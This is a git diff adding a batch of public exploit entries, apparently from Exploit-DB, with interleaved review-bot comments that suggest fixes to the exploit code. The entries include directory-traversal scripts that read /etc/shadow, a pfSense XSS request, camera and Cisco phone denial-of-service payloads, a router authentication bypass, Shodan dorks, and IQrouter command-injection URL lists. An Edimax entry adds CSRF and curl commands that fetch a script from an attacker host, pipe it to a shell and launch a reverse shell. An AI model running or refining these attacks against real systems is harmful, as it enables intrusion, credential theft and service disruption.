diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py new file mode 100755 index 000000000..5ce0b9588 --- /dev/null +++ b/exploits/cgi/webapps/48308.py @@ -0,0 +1,31 @@ +# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal +# Date: 2020-04-10 +# Exploit Author: Basim Alabdullah +# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download +# Version: 3.10.1 +# Tested on: Debian8u2 +# +# Technical Details: +# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. +# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response. +# Note that disclosure of the shadow file may allow an attacker to discover users' passwords +# +# Impact: +# -------- +# Successful exploitation could allow an attacker to obtain sensitive +# information. + +import requests +import sys + +if len(sys.argv) <2: + print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow") + sys.exit(-1) +else: + files=sys.argv[2] + url=sys.argv[1] + with requests.session() as s: + urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs" + response = s.get(urlz, auth=('admin', 'admin'), verify=False) + txt=response.text + print(response.text) \ No newline at end of file diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb new file mode 100755 index 000000000..5e00bbf82 --- /dev/null +++ b/exploits/cgi/webapps/48373.rb 
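Review bot: The argument check `if len(sys.argv) <2:` lets a single-argument invocation through, and `sys.argv[2]` then fails with IndexError instead of the usage message; it should be `if len(sys.argv) < 3:`. `txt=response.text` is assigned and never read, since the next line prints `response.text` directly. `requests.session()` is the legacy lowercase alias; the documented constructor is `requests.Session()`. The request also passes no `timeout`, so a non-responding host leaves the script hanging indefinitely.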
@@ -0,0 +1,83 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Zen Load Balancer Directory Traversal", + 'Description' => %q{ + This module exploits a authenticated directory traversal +vulnerability in Zen Load + Balancer `v3.10.1`. The flaw exists in 'index.cgi' not +properly handling 'filelog=' + parameter which allows a malicious actor to load arbitrary file path. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Basim Alabdullah', # Vulnerability discovery + 'Dhiraj Mishra' # Metasploit module + ], + 'References' => + [ + ['EDB', '48308'] + ], + 'DisclosureDate' => "Apr 10 2020" + )) + + register_options( + [ + Opt::RPORT(444), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), + OptString.new('FILEPATH', [false, 'The name of the file to +download', '/etc/passwd']), + OptString.new('TARGETURI', [true, "The base URI path of the +ZenConsole install", '/']), + OptString.new('HttpUsername', [true, 'The username to use for +the HTTP server', 'admin']), + OptString.new('HttpPassword', [false, 'The password to use for +the HTTP server', 'admin']) + ]) + end + + def run_host(ip) + filename = datastore['FILEPATH'] + traversal = "../" * datastore['DEPTH'] + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.cgi'), + 'vars_get'=> + { + 'id' => '2-3', + 'filelog' => "#{traversal}#(unknown)", + 'nlines' => '100', + 'action' => 'See logs' + }, + 'authorization' => +basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) + }, 25) + + unless res && res.code == 200 + print_error('Nothing was downloaded') + return + end + + print_good("#{peer} - 
Downloaded #{res.body.length} bytes") + path = store_loot( + 'zenload.http', + 'text/plain', + ip, + res.body, + filename + ) + print_good("File saved in: #{path}") + end +end \ No newline at end of file diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt new file mode 100644 index 000000000..f485c9955 --- /dev/null +++ b/exploits/freebsd/webapps/48300.txt 
@@ -0,0 +1,39 @@ +# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.pfsense.org +# Version: PfSense 2.4.4-P3 +# Tested on: FreeBSD 11.2-RELEASE-p10 +# CVE : CVE-2020-11457 + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. +# Vulnerable Parameter : descr + + +# POC +# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. +# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is +# the id of the user containing the payload. + + +POST /system_usermanager.php?act=new HTTP/1.1 +Host: TARGET +Connection: close +Content-Length: 410 +Cache-Control: max-age=0 +Origin: https://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Sec-Fetch-Dest: document +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Referer: https://TARGET/system_usermanager.php?act=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d + 
+__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save \ No newline at end of file diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py new file mode 100755 index 000000000..b73eb9ca5 --- /dev/null +++ b/exploits/hardware/webapps/48304.py 
@@ -0,0 +1,153 @@ +# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) +# Date: 2020-04-07 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://amcrest.com/ +# Software Link: https://amcrest.com/firmwaredownloads +# Version: Many different versions due to number of Dahua/Amcrest/etc +# devices affected +# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 +# 4.000.00AC000.0 +# CVE : CVE-2020-5735 +# Advisory: https://www.tenable.com/security/research/tra-2020-20 +# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash + +import argparse +import hashlib +import socket +import struct +import sys +import md5 +import re + +## DDNS test functionality. Stack overflow via memcpy + +def recv_response(sock): + # minimum size is 32 bytes + header = sock.recv(32) + + # check we received enough data + if len(header) != 32: + print 'Invalid response. Too short' + return (False, '', '') + + # extract the payload length field + length_field = header[4:8] + payload_length = struct.unpack_from('I', length_field) + payload_length = payload_length[0] + + # uhm... lets be restrictive of accepted lengths + if payload_length < 0 or payload_length > 4096: + print 'Invalid response. Bad payload length' + return (False, header, '') + + if (payload_length == 0): + return (True, header, '') + + payload = sock.recv(payload_length) + if len(payload) != payload_length: + print 'Invalid response. 
Bad received length' + return (False, header, payload) + + return (True, header, payload) + +def sofia_hash(msg): + h = "" + m = hashlib.md5() + m.update(msg) + msg_md5 = m.digest() + for i in range(8): + n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e + if n > 9: + if n > 35: + n += 61 + else: + n += 55 + else: + n += 0x30 + h += chr(n) + return h + +top_parser = argparse.ArgumentParser(description='lol') +top_parser.add_argument('-i', '--ip', action="store", dest="ip", +required=True, help="The IPv4 address to connect to") +top_parser.add_argument('-p', '--port', action="store", dest="port", +type=int, help="The port to connect to", default="37777") +top_parser.add_argument('-u', '--username', action="store", +dest="username", help="The user to login as", default="admin") +top_parser.add_argument('--pass', action="store", dest="password", +required=True, help="The password to use") +args = top_parser.parse_args() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "[+] Attempting connection to " + args.ip + ":" + str(args.port) +sock.connect((args.ip, args.port)) +print "[+] Connected!" + +# send the old style login request. We'll use blank hashes. This should +# trigger a challenge from new versions of the camera +old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash + "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash + "\x05\x02\x00\x01\x00\x00\xa1\xaa") +sock.sendall(old_login) +(success, header, challenge) = recv_response(sock) +if success == False or not challenge: + print 'Failed to receive the challenge' + print challenge + sys.exit(0) + +# extract the realm and random seed +seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", +challenge) +if seeds == None: + print 'Failed to extract realm and random seed.' 
+ print challenge + sys.exit(0) + +realm = seeds.group(1) +random = seeds.group(2) + +# compute the response +realm_hash = md5.new(args.username + ":" + realm + ":" + +args.password).hexdigest().upper() +random_hash = md5.new(args.username + ":" + random + ":" + +realm_hash).hexdigest().upper() +sofia_result = sofia_hash(args.password) +final_hash = md5.new(args.username + ":" + random + ":" + +sofia_result).hexdigest().upper() + +challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + + args.username + "&&" + random_hash + final_hash) +sock.sendall(challenge_resp) + +(success, header, payload) = recv_response(sock) +if success == False or not header: + print 'Failed to receive the session id' + sys.exit(0) + +session_id_bin = header[16:20] +session_id_int = struct.unpack_from('I', session_id_bin) +if session_id_int[0] == 0: + print "Log in failed." + sys.exit(0) + +session_id = session_id_int[0] +print "[+] Session ID: " + str(session_id) + +# firmware version +command = "Protocol: " + ("a" * 0x300) + "\r\n" +command_length = struct.pack("I", len(command)) +firmware = ("\x62\x00\x00\x00" + command_length + + "\x04\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + command) +sock.sendall(firmware) +(success, header, firmware_string) = recv_response(sock) +if success == False and not header: + print "[!] Probably crashed the server." +else: + print "[+] Attack failed." \ No newline at end of file diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt new file mode 100644 index 000000000..61e7d2b48 --- /dev/null +++ b/exploits/hardware/webapps/48310.txt 
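Review bot: In `recv_response`, `struct.unpack_from('I', length_field)` uses native byte order and size, so the parsed length depends on the host running the script rather than on the wire format; the byte order should be stated explicitly, e.g. `payload_length = struct.unpack_from('<I', length_field)[0]` if the field is little-endian (the hunk does not show which, so confirm against the protocol). The following `payload_length < 0` branch is unreachable because `'I'` is unsigned. The file imports both `hashlib` and the Python 2-only `md5` module; the `md5.new(...)` calls later in the script could use `hashlib.md5(...)` so only one digest API is needed. The `print` statements pin the whole script to Python 2, which the header comment does not mention.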
@@ -0,0 +1,51 @@ +# Title: Huawei HG630 2 Router - Authentication Bypass +# Date: 2020-04-13 +# Author: Eslam Medhat +# Vendor Homepage: www.huawei.com +# Version: HG630 V2 +# HardwareVersion: VER.B +# CVE: N/A + +#POC: + +The default password of this router is the last 8 characters of the +device's serial number which exist in the back of the device. + +An attacker can leak the serial number via the web app API like the +following: + +************************Request************************ +GET /api/system/deviceinfo HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.1/ +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: +SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm + + +************************Response************************ +HTTP/1.1 200 OK +Cache-Control: no-cache, no-store, max-age=0, must-revalidate +X-Download-Options: noopen +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +Date: Fri, 01 Jan 2010 09:14:47 GMT +Connection: Keep-Alive +Content-Language: en +Content-Type: application/javascript +Content-Length: 141 + +while(1); /*{"DeviceName":"HG630 +V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ + + +You can use that serial number to login to the router. + +#Reference: +https://www.youtube.com/watch?v=vOrIL7L_cVc \ No newline at end of file diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py new file mode 100755 index 000000000..18243acd7 --- /dev/null +++ b/exploits/hardware/webapps/48311.py 
@@ -0,0 +1,43 @@ +# Exploit Title: TVT NVMS 1000 - Directory Traversal +# Date: 2020-04-13 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Vendor Homepage: http://en.tvt.net.cn/ +# Version : N/A +# Software Link : http://en.tvt.net.cn/products/188.html +# Original Author : Numan Türle +# CVE : CVE-2019-20085 + +import sys +import requests +import os +import time + +if len(sys.argv) !=4: + print " " + print "Usage : python exploit.py url filename outputname" + print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" + print " " +else: + + + traversal = "../../../../../../../../../../../../../" + filename = sys.argv[2] + url = sys.argv[1]+traversal+filename + outputname = sys.argv[3] + content = requests.get(url) + + if content.status_code == 200: + + print " " + print "Directory Traversal Succeeded" + time.sleep(3) + print " " + print "Saving Output" + os.system("touch " + outputname) + output_write = open(outputname,"r+") + output_write.write(content.text) + output_write.close() + + else: + + print "Host not vulnerable to Directory Traversal!" \ No newline at end of file diff --git a/exploits/hardware/webapps/48318.txt b/exploits/hardware/webapps/48318.txt new file mode 100644 index 000000000..c9731d595 --- /dev/null +++ b/exploits/hardware/webapps/48318.txt 
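Review bot: `os.system("touch " + outputname)` hands an unquoted argv value to a shell, and the `open(outputname,"r+")` that follows is opened in a mode that fails if the file does not exist and is closed only on the happy path; both issues go away by writing the file directly: `with open(outputname, "w") as output_write:` / `    output_write.write(content.text)`. The usage branch prints help but leaves the exit status at 0, so callers cannot detect a bad invocation; add `sys.exit(1)` there. `requests.get(url)` has no `timeout`, and the `time.sleep(3)` before saving serves no purpose. The `print` statements pin the script to Python 2 without saying so in the header.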
@@ -0,0 +1,42 @@ +# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution +# Date: 2020-04-13 +# Exploit Author: Wadeek +# Hardware Version: EW-7438RPn-v3 Mini +# Firmware Version: 1.23 / 1.27 +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip + +== Shodan Dorks == + +(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp" +(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234" + +== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) == + +GET /wizard_reboot.asp +showSSID = "<WIRELESS-NAME>"; +document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>'); + +== Command Execution * == + +(Setup Mode) +curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +(Unsetup Mode with default password) +curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +== Cross-Site Request Forgery -> Command Execution * == + +<form action="http://edimaxext.setup/goform/mp" method="POST"> + <input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh"> + <input type="submit" value=""> +</form> + +* [ delivery.sh ] +-------------------------------------------------------------------------------------- +# (msfvenom) linux/mipsbe/shell/reverse_tcp +cd /tmp/ +busybox wget -O reverse http://<LHOST>/reverse +busybox chmod +x reverse +./reverse & +-------------------------------------------------------------------------------------- \ No newline at end of file 
diff --git a/exploits/hardware/webapps/48342.txt b/exploits/hardware/webapps/48342.txt new file mode 100644 index 000000000..b143e957d --- /dev/null +++ b/exploits/hardware/webapps/48342.txt 
@@ -0,0 +1,13 @@ +# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC) +# Date: 2020-04-15 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://www.cisco.com +# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html +# Version: Before 11.7(1) +# Tested on: Cisco Wireless IP Phone 8821 +# CVE: CVE-2020-3161 +# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs +# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24 + +curl -v --path-as-is --insecure +https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \ No newline at end of file diff --git a/exploits/hardware/webapps/48358.py b/exploits/hardware/webapps/48358.py new file mode 100755 index 000000000..dc5fb38ab --- /dev/null +++ b/exploits/hardware/webapps/48358.py 
@@ -0,0 +1,339 @@ +# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution +# Date: 2020-04-21 +# Exploit Author: drakylar +# Vendor Homepage: https://evenroute.com/ +# Software Link: https://evenroute.com/iqrouter +# Version: IQrouter firmware up to 3.3.1 +# Tested on: IQrouter firmware 3.3.1 +# CVE : N/A + +#!/usr/bin/env python3 +import argparse +from sys import argv, exit + +try: + import requests +except ImportError: + print("Install requests lib! pip3 install requests") + + +print(""" +####################################################################### +# IQrouter multiple RCE and other vulnerabilities # +# by drakylar (Shaposhnikov Ilya) # +# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # +# CVE-2020-11967 CVE-2020-11968 # +####################################################################### +""") + + +rce_setup = [ + [ + "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'", + "RCE /vlanTag (vlan_tag param)" + ], + [ + "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'", + "RCE /verify_wifi (wifi_conflict param). 
Need hide_wifi_config != true" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2", + "RCE /screen9 (s2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2", + "RCE /screen9 (s1 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'", + "RCE /screen9 (p2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2", + "RCE /screen9 (p1 param)" + ], + [ + "/cgi-bin/luci/er/screen4?save_isp='`{}`", + "RCE /screen4 (save_isp param)" + ], + [ + "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'", + "RCE /screen2 set_wan_modem_interfaces param)" + ], + [ + "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'", + "RCE /screen2 find_ip_address_conflict param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_question='`{}`'", + "RCE /screen10 (set_security_question param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1", + "RCE /screen10 (set_security_answer param)"], + [ + "/cgi-bin/luci/er/screen1?zonename='`{}`'", + "RCE /screen1 (zonename param)" + ], + [ + "/cgi-bin/luci/er/register?email=`{}`", + "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)" + ] +] + +rce_any = [ + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1", + "RCE /wifi (s2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7", + "RCE /wifi (s1 param)" + ], + [ + 
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'", + "RCE /wifi (p2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4", + "RCE /wifi (p1 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_5g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_2g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guest_key param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7", + "RCE /wifi (enable_guestwifi param)" + ], + [ + "/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123", + "RCE /screen11.1 (email param)" + ], + [ + "/cgi-bin/luci/er/reboot_link?link='`{}`'", + "RCE /reboot_link (link param)" + ], + [ + 
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/", + "RCE /diag_wifi (htm5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/", + "RCE /diag_wifi (htm2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/", + "RCE /diag_wifi (c5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/", + "RCE /diag_wifi (c2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/", + "RCE /diag_set_static_wan (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/", + "RCE /diag_set_static_wan (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/", + "RCE /diag_set_static_wan (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/", + "RCE /diag_set_static_wan (dns param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/", + "RCE /diag_set_static_modem (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/", + "RCE /diag_set_static_modem (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/", + "RCE /diag_set_static_modem (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/", + "RCE /diag_set_device_name_and_sync (device_name param)" + ], + [ + 